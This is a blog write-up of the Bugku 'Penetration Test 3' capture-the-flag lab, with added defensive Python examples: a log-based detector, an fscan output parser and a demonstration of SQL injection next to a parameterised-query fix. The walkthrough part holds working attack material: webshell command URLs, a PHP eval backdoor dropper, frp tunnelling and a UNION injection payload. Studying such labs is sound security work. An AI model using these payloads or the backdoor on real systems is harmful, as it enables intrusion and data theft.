bugku Penetration Test 3 WP

flag1,2,3




Brute-force the network segment

The response changes for hosts 1, 2, 10, 138 and 250


Guess that the webshell file name is shell.php




Download frpc remotely

http://192.168.0.10/shell.php?cmd=chmod 777 frpc
http://192.168.0.10/shell.php?cmd=./frpc -c frpc.ini

192.168.0.10/shell.php?cmd=echo "<?php phpinfo();@eval(\$_POST[1]);?>" > 1.php
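An added detection example, not from the original writeup: a small Python script that parses constructed access-log lines and flags query-parameter values that look like the command-injection traffic above (chmod on a dropped file, running a relative binary, writing a PHP eval dropper with echo). The log lines, client IPs and timestamps are made up for the example; only the request paths mirror the URLs in the writeup, and the rule names are my own.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format). The request paths mirror the
# shell.php?cmd= traffic in the writeup; IPs, timestamps and sizes are made up.
LOG_LINES = [
    '192.168.0.100 - - [08/Oct/2023:14:01:02 +0800] "GET /index.php HTTP/1.1" 200 770',
    '192.168.0.100 - - [08/Oct/2023:14:01:10 +0800] "GET /shell.php?cmd=chmod%20777%20frpc HTTP/1.1" 200 12',
    '192.168.0.100 - - [08/Oct/2023:14:01:15 +0800] "GET /shell.php?cmd=./frpc%20-c%20frpc.ini HTTP/1.1" 200 0',
    '192.168.0.100 - - [08/Oct/2023:14:02:00 +0800] "GET /shell.php?cmd=echo%20%22%3C%3Fphp%20phpinfo()%3B%40eval(%24_POST%5B1%5D)%3B%3F%3E%22%20%3E%201.php HTTP/1.1" 200 0',
    '192.168.0.101 - - [08/Oct/2023:14:03:00 +0800] "GET /search.php?q=chmod+tutorial HTTP/1.1" 200 4100',
]

# Combined-log-format prefix: ip, ident, user, [timestamp], "METHOD path PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

# Each rule is (name, regex) and is applied to every URL-decoded parameter value.
# Rule names are this example's own labels, not from any product.
RULES = [
    ("chmod-on-file", re.compile(r"(^|[;&|\s])chmod\s+[0-7]{3,4}\s+\S+")),
    ("exec-relative-binary", re.compile(r"(^|[;&|\s])\./\S+")),
    ("php-dropper-via-redirect", re.compile(r"<\?php.*>\s*\S+\.php", re.S)),
    ("eval-of-request-input", re.compile(r"eval\s*\(\s*\$_(POST|GET|REQUEST)")),
]


def parse_line(line):
    """Split one access-log line into fields; return None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["path"])
    rec["script"] = parts.path
    # parse_qs URL-decodes values, so "chmod%20777%20frpc" becomes "chmod 777 frpc".
    rec["params"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def detect(lines):
    """Return (ip, script, parameter, rule) for every parameter value that matches a rule."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for param, values in rec["params"].items():
            for value in values:
                for name, rx in RULES:
                    if rx.search(value):
                        hits.append((rec["ip"], rec["script"], param, name))
    return hits


def suspicious_scripts(hits):
    """Scripts that received at least one flagged request, for triage."""
    return sorted({script for _ip, script, _param, _rule in hits})


if __name__ == "__main__":
    for hit in detect(LOG_LINES):
        print(hit)
    print("review:", suspicious_scripts(detect(LOG_LINES)))
```

The benign `search.php?q=chmod+tutorial` line is included on purpose: the chmod rule requires an octal mode and a file name after the word, so a search term does not fire it. In practice these rules belong in the web server's log pipeline or a WAF, and a hit on a script that the application does not ship (here `shell.php`) is the stronger signal than any single rule.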


Then use AntSword to upload a Godzilla webshell

Use Godzilla to upload fscan and scan

Pitfall: no ping permission

Add the -np parameter to fscan
./fscan -np -h xxx > 1.txt

start infoscan
192.168.0.1:22 open
192.168.0.10:80 open
192.168.0.2:80 open
192.168.0.1:80 open
192.168.0.138:80 open
192.168.0.250:80 open
192.168.0.2:9000 open
192.168.0.10:9000 open
192.168.0.250:9000 open
[*] WebTitle: http://192.168.0.138      code:200 len:953    title:Bugku分数查询系统
[*] WebTitle: http://192.168.0.1        code:200 len:1987   title:站长之家 - 模拟蜘蛛爬取
[*] WebTitle: http://192.168.0.250      code:200 len:2035   title:用户登录
[*] WebTitle: http://192.168.0.10       code:200 len:770    title:葫芦娃小组
[+] http://192.168.0.250 poc-yaml-eea-info-leak-cnvd-2021-10543 
[+] http://192.168.0.250 poc-yaml-php-cgi-cve-2012-1823 
[+] http://192.168.0.10 poc-yaml-php-cgi-cve-2012-1823
10.10.0.1:22 open
10.10.0.22:80 open
10.10.0.5:80 open
10.10.0.1:80 open
10.10.0.5:9000 open
10.10.0.22:9000 open
[*] WebTitle: http://10.10.0.5          code:200 len:770    title:葫芦娃小组
[*] WebTitle: http://10.10.0.22         code:200 len:3764   title:Bugku 渗透测试3 - home
[+] http://10.10.0.5 poc-yaml-php-cgi-cve-2012-1823 
[+] http://10.10.0.1 poc-yaml-php-cgi-cve-2012-1823
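Added example, not part of the original writeup: a Python parser that turns fscan's plain-text output (the block above, embedded here as the sample input) into per-host findings, so a defender reviewing such a scan can see which hosts expose which ports and which poc-yaml checks fired on more than one host. The field names `ports`, `titles` and `pocs` are my own choice.

```python
import re
from collections import defaultdict

# Sample input: the fscan output shown in the writeup, embedded verbatim.
SAMPLE = """start infoscan
192.168.0.1:22 open
192.168.0.10:80 open
192.168.0.2:80 open
192.168.0.1:80 open
192.168.0.138:80 open
192.168.0.250:80 open
192.168.0.2:9000 open
192.168.0.10:9000 open
192.168.0.250:9000 open
[*] WebTitle: http://192.168.0.138      code:200 len:953    title:Bugku分数查询系统
[*] WebTitle: http://192.168.0.1        code:200 len:1987   title:站长之家 - 模拟蜘蛛爬取
[*] WebTitle: http://192.168.0.250      code:200 len:2035   title:用户登录
[*] WebTitle: http://192.168.0.10       code:200 len:770    title:葫芦娃小组
[+] http://192.168.0.250 poc-yaml-eea-info-leak-cnvd-2021-10543 
[+] http://192.168.0.250 poc-yaml-php-cgi-cve-2012-1823 
[+] http://192.168.0.10 poc-yaml-php-cgi-cve-2012-1823
10.10.0.1:22 open
10.10.0.22:80 open
10.10.0.5:80 open
10.10.0.1:80 open
10.10.0.5:9000 open
10.10.0.22:9000 open
[*] WebTitle: http://10.10.0.5          code:200 len:770    title:葫芦娃小组
[*] WebTitle: http://10.10.0.22         code:200 len:3764   title:Bugku 渗透测试3 - home
[+] http://10.10.0.5 poc-yaml-php-cgi-cve-2012-1823 
[+] http://10.10.0.1 poc-yaml-php-cgi-cve-2012-1823
"""

# The three line shapes fscan prints in the block above.
PORT_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5}) open\s*$")
TITLE_RE = re.compile(r"^\[\*\] WebTitle: (\S+)\s+code:(\d+)\s+len:(\d+)\s+title:(.*)$")
POC_RE = re.compile(r"^\[\+\] (\S+) (poc-yaml-\S+)\s*$")


def host_of(url):
    """Host part of http://host[:port]/... (no port, no path)."""
    return url.split("//", 1)[-1].split("/", 1)[0].split(":", 1)[0]


def ip_key(ip):
    """Sort key so 10.10.0.5 comes before 10.10.0.22."""
    return tuple(int(x) for x in ip.split("."))


def parse_fscan(text):
    """Parse fscan output into {ip: {'ports': [...], 'titles': {url: title}, 'pocs': [(url, poc)]}}.

    Lines that match none of the three formats (e.g. 'start infoscan') are ignored.
    """
    hosts = defaultdict(lambda: {"ports": set(), "titles": {}, "pocs": []})
    for line in text.splitlines():
        line = line.rstrip()
        m = PORT_RE.match(line)
        if m:
            hosts[m.group(1)]["ports"].add(int(m.group(2)))
            continue
        m = TITLE_RE.match(line)
        if m:
            url, _code, _length, title = m.groups()
            hosts[host_of(url)]["titles"][url] = title.strip()
            continue
        m = POC_RE.match(line)
        if m:
            url, poc = m.groups()
            hosts[host_of(url)]["pocs"].append((url, poc))
    return {ip: {"ports": sorted(v["ports"]), "titles": v["titles"], "pocs": v["pocs"]}
            for ip, v in hosts.items()}


def hosts_with_port(findings, port):
    """IPs exposing the given port, in numeric order."""
    return sorted((ip for ip, f in findings.items() if port in f["ports"]), key=ip_key)


def poc_counts(findings):
    """(poc name, number of distinct hosts it fired on), most widespread first."""
    counts = defaultdict(set)
    for ip, f in findings.items():
        for _url, poc in f["pocs"]:
            counts[poc].add(ip)
    return sorted(((poc, len(ips)) for poc, ips in counts.items()), key=lambda p: (-p[1], p[0]))


if __name__ == "__main__":
    results = parse_fscan(SAMPLE)
    for ip in sorted(results, key=ip_key):
        print(ip, results[ip])
    print("9000/tcp exposed on:", hosts_with_port(results, 9000))
    print("poc hits by host count:", poc_counts(results))
```

The aggregation is the point: the same php-cgi check fires on four hosts across both segments, and every host with 80 open except 192.168.0.1 and 192.168.0.138 also exposes 9000 (the usual PHP-FPM port), which is what a defender would want to prioritise rather than reading the raw lines one by one.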

flag7,8
http://192.168.0.250/
Configure Burp Suite's SOCKS5 proxy





flag4
http://192.168.0.138
0 union select 1,2,3,flag from flag
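Added example, not from the original writeup: a Python/sqlite3 model of why the UNION payload above works against a query that concatenates user input into the SQL text, and why a parameterised query stops it. The table names (`scores`, `flag`), column names and the placeholder flag value are constructed assumptions; the actual application on 192.168.0.138 is not shown on the page.

```python
import sqlite3

# The payload from the writeup, unchanged.
PAYLOAD = "0 union select 1,2,3,flag from flag"


def build_db():
    """Constructed in-memory stand-in for the score-query app (schema is assumed)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE scores(id INTEGER, name TEXT, score INTEGER, remark TEXT);
        INSERT INTO scores VALUES (1, 'alice', 90, 'ok'), (2, 'bob', 75, 'ok');
        CREATE TABLE flag(flag TEXT);
        INSERT INTO flag VALUES ('flag{placeholder}');
    """)
    return conn


def lookup_vulnerable(conn, user_id):
    """String concatenation: the input becomes part of the SQL, so a UNION
    with the same number of columns (four here) appends rows from another table."""
    sql = "SELECT id, name, score, remark FROM scores WHERE id = " + user_id
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id):
    """Parameterised query: the input is bound as a value and never parsed as SQL."""
    sql = "SELECT id, name, score, remark FROM scores WHERE id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


def lookup_safe_typed(conn, user_id):
    """Stricter variant: reject anything that is not a plain integer before querying.
    Returns None for invalid input so the caller can answer with a 400 instead of a query."""
    if not user_id.isdigit():
        return None
    return lookup_safe(conn, int(user_id))


if __name__ == "__main__":
    db = build_db()
    print("concatenated:", lookup_vulnerable(db, PAYLOAD))
    print("parameterised:", lookup_safe(db, PAYLOAD))
    print("typed:", lookup_safe_typed(db, PAYLOAD), lookup_safe_typed(db, "1"))
```

The parameterised version returns no rows for the payload because SQLite compares the whole string against the integer column; the typed version never reaches the database at all. The fix for a "score query by id" endpoint is the latter: bind the value and validate its type.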

flag5,6
http://10.10.0.22/


At first I thought I could get a shell here, but it didn't work

Found another file upload point


posted @ 2023-10-08 14:24 BattleofZhongDinghe